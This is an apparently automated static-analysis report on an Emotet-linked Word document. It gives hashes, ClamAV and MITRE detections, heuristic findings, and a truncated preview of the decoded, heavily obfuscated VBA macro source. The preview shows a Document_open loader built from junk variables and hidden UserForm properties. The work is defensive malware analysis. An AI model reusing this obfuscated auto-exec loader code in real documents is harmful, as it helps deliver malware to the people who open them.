Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9390910f92f9ab4b…

MALICIOUS

Office (OLE)

Size: 101.3 KB
Created: 2019-12-19 11:15:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: da497160be53a5bda7967d363dfaebae
SHA-1: 1823a8fdb71735ea2c40df23a7757c752cec8d35
SHA-256: 9390910f92f9ab4b0e2864ef5aa1346d98c884535164b6dbad0d711054e7cc04
Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7464357-0', strongly indicating the Emotet family. Critical heuristics indicate a VBA UserForm hidden-property command stager that runs automatically from the Document_Open macro and uses CreateObject and GetObject calls, most likely to download and run a secondary payload. The extracted VBA source ('macros.bas', carved below) is the origin of this behavior.

Heuristics (8 findings)

  • ClamAV: Doc.Downloader.Emotet-7464357-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464357-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13306 bytes
SHA-256: 2fd6c1d13d86485279b9625ca65b0d8796c33dc2c319c4c2f1adfc3fe19d0ecf
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Eeglwfvuypu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Srabtjse, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Jteniafb = "Peggy"
Dim Xrfxwfqtvcm As Double
Dim Wqjgyebmukwbv As Double
Emdaknscfk = ("Marilyn")
Dim Qtsbnruiwz As Double
Dim Wybdgiwbm As Boolean
Dim Iylgldodwst As String
Bjijajpftxel = Wwoeymdkcbk
Dim Ivxocnibw As String
Bdokobhuap = ("Sequi quia itaque ipsam molestiae ipsa quos debitis perferendis.")
Dim Hnvzprhgy As Boolean
Dim Gjwibycnz As Boolean
Dim Dvxtvbup As Double
Qopagotjpsn = "Rerum tempora."
Dim Iassgwxbsjfka As String
Dim Wfmjjppughuk As Boolean
Dim Kepuwosd As Double
Tkoyfkqflyn = ("Rerum ipsum sed mollitia voluptatem aliquam et sunt.")
Dim Ezisglkll As Integer
Heqpencswypzb = 152
Wrpykpaykvn = Rycivpraua
Vunhozhbrptvm = 340
Mqdsecahoyom
   Ygpzjssp = "Orville"
Dim Jdssgggbljuww As Double
Dim Rnizqgtdmu As Integer
Aaddjoqdimwn = ("Delbert")
Dim Ahbgckuos As Integer
Dim Qnrpzfyzmf As Double
Dim Flhfrbfru As Integer
Glcgsxylhy = Bynjgyouzyaw
Dim Ednmnoyckexz As Boolean
Nutjmsfh = ("Delectus magnam et quos est provident.")
Dim Ztgxlilgkxtv As Boolean
Dim Keuznilgsmge As Integer
Dim Jcowyunuiaq As Integer
Rpiisvzzhygt = "Consequuntur error possimus voluptas placeat."
Dim Sauqheuwi As Double
Dim Xdhpwtjlourjd As Integer
Dim Frbeidcnuu As Boolean
Jyzvgzmurs = ("Debitis at.")
Dim Ewihmbqrby As Boolean
Udasvqmv = 823
Ampzkkquqn = Zlvubtdwikz
Dytzbfoc = 859
End Sub

Attribute VB_Name = "Ocqunouq"
Attribute VB_Base = "0{E0F51CF9-E923-4BF1-A02D-9AFD67A4F88D}{80D98A36-08FF-41AE-9287-7B1F2DD63418}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Whsthngo"
Function Ooomipyk()
   Vzxszlcqk = "Aliquam sunt et nostrum."
Dim Rbtpwxzoo As Double
Dim Oqkpwuycnlt As Boolean
Nzizkrscq = ("Aut.")
Dim Byandtbb As Double
Dim Lhikohrhh As Integer
Dim Incwpzdxrnxtj As Integer
Tkzukrxzbszpv = Uibdtkyq
Dim Xefsnnywqohh As Double
Fknaepkhnq = ("Reprehenderit enim.")
Dim Rguoutlamns As Double
Dim Fbsfutmvrxi As String
Dim Mxiprozywsbcu As Boolean
Mxssgmzorcsxg = "Quos esse quisquam quo."
Dim Jmrwhnrwvdipi As String
Dim Dagqjteppmnj As Integer
Dim Yrsfwjokyfi As Integer
Wpywqfay = ("Delectus tenetur sunt.")
Dim Pjgexbjteaj As Integer
Pjmzctcaio = 402
Arpxdroga = Qeriomdurzcjn
Xfpqhvnxw = 791
Fqnczrgmr = Eeglwfvuypu.Srabtjse
   Kohnpgtz = "Dolor quod consequuntur perferendis reprehenderit qui ab."
Dim Vvbnauikohl As String
Dim Vihfarfrsrps As Integer
Zjvwobyur = ("Dolor cupiditate et et.")
Dim Boxnsdrutm As String
Dim Ashlzcemu As String
Dim Jbskwowarow As Double
Ieanxyuv = Vdhpzrmg
Dim Bnmztufxlot As Integer
Educrowtrpzx = ("Dana")
Dim Zxjeihlburb As Integer
Dim Swkfiqkc As Boolean
Dim Pvsrukxm As Double
Egzcjlxhdid = "Voluptatem ratione voluptatem."
Dim Kewgkrgvnmsti As String
Dim Qqxezgymwiv As Integer
Dim Dydboyhnydnv As Boolean
Qthibvirnlyb = ("Perferendis saepe.")
Dim Szyounspir As Double
Ibrmjjdphs = 164
Ublmlscmiuuzf = Iybkpdqm
Aboyaezjyusbg = 627
Qlbsdnpiqxfiy = Fqnczrgmr + Ocqunouq.Jtsmkdqpig + Ocqunouq.Tqmdsjidz + Ocqunouq.Hpkiuhnpwqlk
   Ejzduzgvbn = "Vitae quia non."
Dim Jdnlqdiqdnqm As String
Dim Rsvgiwuuxfyft As Double
Sosdwqgym = ("Corporis eligendi sed.")
Dim Yoirtmavhoaue As Boolean
Dim Pfhnlkgllyyjf As Integer
Dim Tifiyglgml As Double
Tqrtnwxbaqypo = Xsudumwu
Dim Whtdzvbhmmv As Integer
Knihkcjp = ("At earum saepe.")
Dim Donrijlxv As Boolean
Dim Rodyavxic As Double
Dim Dokpmfmri As Boolean
Apometxb = "Rerum tempore accusantium."
Dim Uztyfjjhmhrcx As Integer
Dim Hsxfkerfponjo As Double
Dim Kaohjoqr As Boolean
Cjvrkxsdnwaav = ("Loretta")
Dim Cudkravqiwrn As Stri
... (truncated)